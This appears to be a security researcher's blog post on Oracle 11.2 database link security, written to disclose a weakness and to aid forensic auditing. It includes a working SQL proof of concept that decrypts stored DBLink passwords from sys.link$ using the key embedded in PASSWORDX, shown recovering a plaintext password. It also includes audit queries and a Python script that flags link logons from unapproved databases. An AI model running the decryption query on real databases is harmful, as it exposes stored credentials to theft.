Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Database Link Security

Hello Oracle Security folks,

Good news and bad news – which would you like first?

Ok.. so the bad news is that the following users, roles and privileges can select and decrypt DBLink passwords on 11.2, because the key needed to decrypt the ciphertext is stored alongside it in the same PASSWORDX value:
• SYS
• SYSDBA
• DBA
• SYS WITHOUT SYSDBA
• SYSASM
• EXP_FULL_DATABASE
• DATAPUMP_EXP_FULL_DATABASE
• DATAPUMP_IMP_FULL_DATABASE

PoC:

SQL> CREATE DATABASE LINK "TEST_LINK" CONNECT TO "DBLINK_ACCOUNT" IDENTIFIED BY MYPW USING '(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =(PROTOCOL=TCP)(HOST=192.168.0.25)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=ORCL11)))';

Database link created.

SQL> select name, userid, passwordx from sys.link$ where name='TEST_LINK';
NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORDX
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
058CC531A7BBC08390C066B29CB2E26AF1

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
MYPW

The above issue did not make my Top 10 New Oracle Security Issues which I will publish at UKOUG 2012 on Monday http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62.

So the good news is that the Oracle audit trail now records incoming DBLink activity, including the global name of the client database the link originates from.

select userid, ntimestamp#, userhost, comment$text from sys.aud$ where comment$text like 'DBLINK%';

USERID          NTIMESTAMP#                   USERHOST  COMMENT$TEXT
--------------  ----------------------------  --------  -------------------------------------------------
DBLINK_ACCOUNT  19-NOV-12 01.42.16.305194000  orlin     DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT  19-NOV-12 01.42.17.086395000  orlin     DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT  19-NOV-12 01.42.17.086856000  orlin     DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
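
As an added example (not the post's own code), here is a Python check over rows exported from SYS.AUD$ in the column shape shown above: it parses the DBLINK_INFO text, counts incoming link logons per source database and flags any SOURCE_GLOBAL_NAME that is not on a hypothetical allowlist. The sample rows and the allowlist are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample rows in the shape of the SYS.AUD$ columns above:
# (USERID, NTIMESTAMP#, USERHOST, COMMENT$TEXT). Only the DBLINK_INFO format and
# the orcl.4294967295 source name come from the post; the rest is made up.
SAMPLE_AUD_ROWS = [
    ("DBLINK_ACCOUNT", "19-NOV-12 01.42.16.305194000", "orlin",
     "DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)"),
    ("DBLINK_ACCOUNT", "19-NOV-12 01.42.17.086395000", "orlin",
     "DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)"),
    ("DBLINK_ACCOUNT", "19-NOV-12 03.15.02.000000000", "devbox",
     "DBLINK_INFO: (SOURCE_GLOBAL_NAME=devdb.1234567890)"),  # not an approved source
    ("SCOTT", "19-NOV-12 03.16.00.000000000", "orlin", "Authenticated by: DATABASE"),  # not a link logon
]

# Hypothetical allowlist: global names of the databases that are supposed to hold links into this one.
APPROVED_SOURCES = {"orcl.4294967295"}

DBLINK_INFO_RE = re.compile(r"DBLINK_INFO:\s*\(SOURCE_GLOBAL_NAME=([^)]+)\)")


def parse_source_global_name(comment_text):
    """Return SOURCE_GLOBAL_NAME from a COMMENT$TEXT value, or None if it is not a DBLINK_INFO entry."""
    match = DBLINK_INFO_RE.search(comment_text or "")
    return match.group(1) if match else None


def summarize_dblink_sources(rows):
    """Count incoming link logons per (USERID, SOURCE_GLOBAL_NAME) so the normal pairs stand out."""
    counts = Counter()
    for userid, _timestamp, _userhost, comment in rows:
        source = parse_source_global_name(comment)
        if source is not None:
            counts[(userid, source)] += 1
    return counts


def find_unexpected_dblink_sources(rows, approved_sources):
    """Return the DBLINK_INFO rows whose source database is not on the allowlist."""
    findings = []
    for userid, timestamp, userhost, comment in rows:
        source = parse_source_global_name(comment)
        if source is not None and source not in approved_sources:
            findings.append({"userid": userid, "timestamp": timestamp,
                             "userhost": userhost, "source": source})
    return findings


if __name__ == "__main__":
    for f in find_unexpected_dblink_sources(SAMPLE_AUD_ROWS, APPROVED_SOURCES):
        print(f"ALERT: {f['userid']} logon from unapproved source {f['source']} ({f['userhost']}, {f['timestamp']})")
```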

This DBLINK_INFO is very useful, and the attached paper expands a little on the subject of DBLink security, including forensic response. More to come at UKOUG in Birmingham.

Cheers,
Paul
